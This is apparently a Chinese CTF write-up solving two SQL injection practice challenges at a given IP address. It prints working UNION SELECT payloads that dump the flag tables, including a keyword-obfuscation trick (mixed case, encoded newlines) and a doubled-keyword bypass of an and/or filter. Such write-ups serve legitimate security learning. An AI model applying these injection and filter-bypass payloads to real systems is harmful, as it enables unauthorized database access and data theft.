兩道sql練習題

1.注入得帥照!

地址:http://123.57.240.205:4002/

點擊前往按鈕會直接跳轉到W4nder的博客,爆破可以得到一個hint(hone.php)
在這裏插入圖片描述
hone.php是這樣的一個界面,可以開始注入
在這裏插入圖片描述

payload:id=9122399%27%20%0a%20UNion%20%0a%20SElect%20%0a%201,(SElect%20%0a%20flag%20%0a%20from%20%0a%20flag),2%20%0a%20and%20%0a%20%271%27=%271

在這裏插入圖片描述
得到了一個html頁面,找到了flag(css特別好看)
在這裏插入圖片描述
flag在源碼中被註釋掉了
在這裏插入圖片描述

flag{W4nder_always_god}

2.對方的服務器漏洞口

地址:http://123.57.240.205:4001/check.php

在這裏插入圖片描述
這道題一開始卡了很久,我以爲是有很多過濾,最後發現只有and和or
用anandd繞過就行
在這裏插入圖片描述
找到注入點以後就很好做了,常規操作就行

id=0 union select 1,database(),3,4

在這裏插入圖片描述

payload:id=0 union select 1,group_concat(flag),3,4 from flag

在這裏插入圖片描述
在這裏插入圖片描述

flag{plz_keep_striving_for_your_dream 😃}
發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章